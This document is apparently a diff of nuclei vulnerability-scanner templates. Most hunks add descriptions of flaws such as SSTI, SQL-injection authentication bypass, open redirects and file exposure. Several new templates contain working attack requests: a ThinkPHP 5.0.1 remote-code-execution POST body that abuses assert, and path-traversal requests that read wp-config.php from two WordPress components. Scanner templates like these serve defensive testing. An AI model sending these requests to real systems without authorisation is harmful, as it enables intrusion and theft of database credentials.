name: Twig PHP <2.4.4 template engine - SSTI
|
||||||
author: madrobot
|
author: madrobot
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Twig PHP allows remote attackers to cause the product to execute arbitrary commands via an SSTI vulnerability.
|
||||||
tags: php,ssti
|
tags: php,ssti
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: UEditor Arbitrary File Upload
|
name: UEditor Arbitrary File Upload
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in UEditor allows remote unauthenticated attackers to upload arbitrary files to the server, this in turn can be used to make the application to execute their content as code.
|
||||||
reference:
|
reference:
|
||||||
- https://zhuanlan.zhihu.com/p/85265552
|
- https://zhuanlan.zhihu.com/p/85265552
|
||||||
- https://www.freebuf.com/vuls/181814.html
|
- https://www.freebuf.com/vuls/181814.html
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Unauthenticated Hoteldruid Panel
|
name: Unauthenticated Hoteldruid Panel
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
|
||||||
reference: https://www.hoteldruid.com/
|
reference: https://www.hoteldruid.com/
|
||||||
tags: hoteldruid,panel,unauth
|
tags: hoteldruid,panel,unauth
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: Unauthenticated Spark REST API
|
name: Unauthenticated Spark REST API
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it.
|
||||||
reference: https://xz.aliyun.com/t/2490
|
reference: https://xz.aliyun.com/t/2490
|
||||||
tags: spark,unauth
|
tags: spark,unauth
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
|
name: viewLinc viewLinc/5.1.2.367 (and sometimes 5.1.1.50) is vulnerable to CRLF Injection.
|
||||||
author: geeknik
|
author: geeknik
|
||||||
severity: low
|
severity: low
|
||||||
|
description: The viewLinc application allows remote attackers to inject a CRLF character into the responses returned by the product, this allows attackers to inject arbitrary HTTP headers into the response returned.
|
||||||
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
|
reference: https://www.vaisala.com/en/products/systems/indoor-monitoring-systems/viewlinc-continuous-monitoring-system
|
||||||
tags: crlf,viewlinc
|
tags: crlf,viewlinc
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Vehicle Parking Management System 1.0 - Authentication Bypass
|
name: Vehicle Parking Management System 1.0 - Authentication Bypass
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
|
description: The Vehicle Parking Management System allows remote attackers to bypass the authentication system by utilizing an SQL injection vulnerability in the 'password' parameter.
|
||||||
reference: https://www.exploit-db.com/exploits/48877
|
reference: https://www.exploit-db.com/exploits/48877
|
||||||
tags: auth-bypass
|
tags: auth-bypass
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: WebUI 1.5b6 RCE
|
name: WebUI 1.5b6 RCE
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
|
||||||
reference: https://www.exploit-db.com/exploits/36821
|
reference: https://www.exploit-db.com/exploits/36821
|
||||||
tags: webui,rce
|
tags: webui,rce
|
||||||
|
|
||||||
|
|
|
@ -5,7 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: xss
|
tags: xss
|
||||||
|
description: A vulnerability in WEMS Enterprise Manager allows remote attackers to inject arbitrary Javascript into the response return by the server by sending it to the '/guest/users/forgotten' endpoint and the 'email' parameter.
|
||||||
reference:
|
reference:
|
||||||
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
|
- https://packetstormsecurity.com/files/155777/WEMS-Enterprise-Manager-2.58-Cross-Site-Scripting.html
|
||||||
|
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: critical
|
severity: critical
|
||||||
tags: yapi,rce
|
tags: yapi,rce
|
||||||
|
description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.
|
||||||
reference:
|
reference:
|
||||||
- https://www.secpulse.com/archives/162502.html
|
- https://www.secpulse.com/archives/162502.html
|
||||||
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
- https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
|
||||||
|
|
|
@ -5,6 +5,7 @@ info:
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: low
|
severity: low
|
||||||
tags: apache,rce
|
tags: apache,rce
|
||||||
|
description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code.
|
||||||
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
|
reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -1,9 +1,10 @@
|
||||||
id: zhiyuan-file-upload
|
id: zhiyuan-file-upload
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Zhiyuan Oa arbitrary file upload vulnerability
|
name: Zhiyuan OA arbitrary file upload vulnerability
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed.
|
||||||
reference: https://www.programmersought.com/article/92658169875/
|
reference: https://www.programmersought.com/article/92658169875/
|
||||||
tags: zhiyuan,rce
|
tags: zhiyuan,rce
|
||||||
|
|
||||||
|
|
|
@ -1,9 +1,10 @@
|
||||||
id: zhiyuan-oa-session-leak
|
id: zhiyuan-oa-session-leak
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Zhiyuan Oa Session Leak
|
name: Zhiyuan OA Session Leak
|
||||||
author: pikpikcu
|
author: pikpikcu
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
|
||||||
reference: https://www.zhihuifly.com/t/topic/3345
|
reference: https://www.zhihuifly.com/t/topic/3345
|
||||||
tags: zhiyuan,leak,disclosure
|
tags: zhiyuan,leak,disclosure
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Zimbra Collaboration Suite (ZCS) - SSRF
|
name: Zimbra Collaboration Suite (ZCS) - SSRF
|
||||||
author: gy741
|
author: gy741
|
||||||
severity: critical
|
severity: critical
|
||||||
|
description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code.
|
||||||
reference:
|
reference:
|
||||||
- https://www.adminxe.com/2183.html
|
- https://www.adminxe.com/2183.html
|
||||||
tags: zimbra,ssrf,oast
|
tags: zimbra,ssrf,oast
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: Zoo Management System 1.0 - Authentication Bypass
|
name: Zoo Management System 1.0 - Authentication Bypass
|
||||||
author: dwisiswant0
|
author: dwisiswant0
|
||||||
severity: high
|
severity: high
|
||||||
|
description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability.
|
||||||
reference: https://www.exploit-db.com/exploits/48880
|
reference: https://www.exploit-db.com/exploits/48880
|
||||||
tags: auth-bypass,zms
|
tags: auth-bypass,zms
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: thinkphp-501-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ThinkPHP 5.0.1 RCE
|
||||||
|
author: lark-lab
|
||||||
|
severity: critical
|
||||||
|
tags: thinkphp,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/?s=index/index/index"
|
||||||
|
body: "s=phpinfo()&_method=__construct&filter=assert"
|
||||||
|
headers:
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "PHP Extension"
|
||||||
|
- "PHP Version"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: SMTP WP Plugin Directory listing enabled
|
name: SMTP WP Plugin Directory listing enabled
|
||||||
author: PR3R00T
|
author: PR3R00T
|
||||||
severity: high
|
severity: high
|
||||||
|
description: The WordPress Easy WP SMTP Plugin has its 'easy-wp-smtp' folder remotely acccessible and its content available for access.
|
||||||
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
|
reference: https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
|
||||||
tags: wordpress,wp-plugin
|
tags: wordpress,wp-plugin
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
name: WordPress Attitude Themes 1.1.1 Open Redirection
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: low
|
severity: low
|
||||||
|
description: The WordPress Attitude Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||||
reference: https://cxsecurity.com/issue/WLB-2020030183
|
reference: https://cxsecurity.com/issue/WLB-2020030183
|
||||||
tags: wordpress,wp-theme,redirect
|
tags: wordpress,wp-theme,redirect
|
||||||
|
|
||||||
|
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
|
name: WordPress Weekender Newspaper Themes 9.0 - Open Redirection
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: low
|
severity: low
|
||||||
|
description: The WordPress Weekender Newspaper Themes allows remote attackers to redirect users to an attacker controlled URL.
|
||||||
reference: https://cxsecurity.com/issue/WLB-2020040103
|
reference: https://cxsecurity.com/issue/WLB-2020040103
|
||||||
tags: wordpress,wp-plugin,redirect
|
tags: wordpress,wp-plugin,redirect
|
||||||
|
|
||||||
|
|
|
@ -3,6 +3,7 @@ info:
|
||||||
name: WordPress accessible wp-config
|
name: WordPress accessible wp-config
|
||||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
|
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n
|
||||||
severity: high
|
severity: high
|
||||||
|
description: The remote WordPress installation has the `wp-config` file remotely accessible and its content available for reading.
|
||||||
tags: wordpress,backup
|
tags: wordpress,backup
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: wp-javospot-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
reference:
|
||||||
|
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
|
||||||
|
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
|
||||||
|
- https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
|
||||||
|
tags: wordpress,wp-theme,lfi,wp
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "DB_NAME"
|
||||||
|
- "DB_PASSWORD"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -4,6 +4,7 @@ info:
|
||||||
name: WordPress Oxygen-Theme Themes LFI
|
name: WordPress Oxygen-Theme Themes LFI
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: high
|
severity: high
|
||||||
|
description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter.
|
||||||
tags: wordpress,wp-theme,lfi
|
tags: wordpress,wp-theme,lfi
|
||||||
reference: https://cxsecurity.com/issue/WLB-2019030178
|
reference: https://cxsecurity.com/issue/WLB-2019030178
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: wp-tinymce-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
|
||||||
|
- http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
|
||||||
|
tags: wordpress,wp-theme,lfi,wordpress,tinymce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "DB_NAME"
|
||||||
|
- "DB_PASSWORD"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: wordpress-upload-data
|
name: wordpress-upload-data
|
||||||
author: pussycat0x
|
author: pussycat0x
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Searches for Passwords in the wordpress uploads directory.
|
description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it.
|
||||||
reference: https://www.exploit-db.com/ghdb/7040
|
reference: https://www.exploit-db.com/ghdb/7040
|
||||||
tags: wordpress,listing
|
tags: wordpress,listing
|
||||||
|
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Woocommerce PDF Invoice Exposure
|
name: Woocommerce PDF Invoice Exposure
|
||||||
author: mohammedsaneem,sec_hawk
|
author: mohammedsaneem,sec_hawk
|
||||||
severity: medium
|
severity: medium
|
||||||
description: Allows attacker to view sensitive information such as company invoices
|
description: A vulnerability in Woocommerce allows remote unauthenticated attackers to access company invoices and other sensitive information.
|
||||||
reference:
|
reference:
|
||||||
- https://twitter.com/sec_hawk/status/1426984595094913025?s=21
|
- https://twitter.com/sec_hawk/status/1426984595094913025?s=21
|
||||||
- https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
|
- https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
|
||||||
|
|
|
@ -4,6 +4,14 @@ info:
|
||||||
name: WPTouch Switch Desktop 3.x Open Redirection
|
name: WPTouch Switch Desktop 3.x Open Redirection
|
||||||
author: 0x_Akoko
|
author: 0x_Akoko
|
||||||
severity: medium
|
severity: medium
|
||||||
|
description: |
|
||||||
|
WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks.
|
||||||
|
|
||||||
|
An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance.
|
||||||
|
|
||||||
|
Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data.
|
||||||
|
|
||||||
|
The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible.
|
||||||
reference: https://cxsecurity.com/issue/WLB-2020030114
|
reference: https://cxsecurity.com/issue/WLB-2020030114
|
||||||
tags: wp-plugin,redirect,wordpress
|
tags: wp-plugin,redirect,wordpress
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,12 @@
|
||||||
|
id: hikvision-workflow
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision Security Checks
|
||||||
|
author: pdteam
|
||||||
|
description: A simple workflow that runs all Hikvision related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
|
||||||
|
- template: technologies/hikvision-detection.yaml
|
||||||
|
subtemplates:
|
||||||
|
- template: cves/2021/CVE-2021-36260.yaml
|
Loading…
Reference in New Issue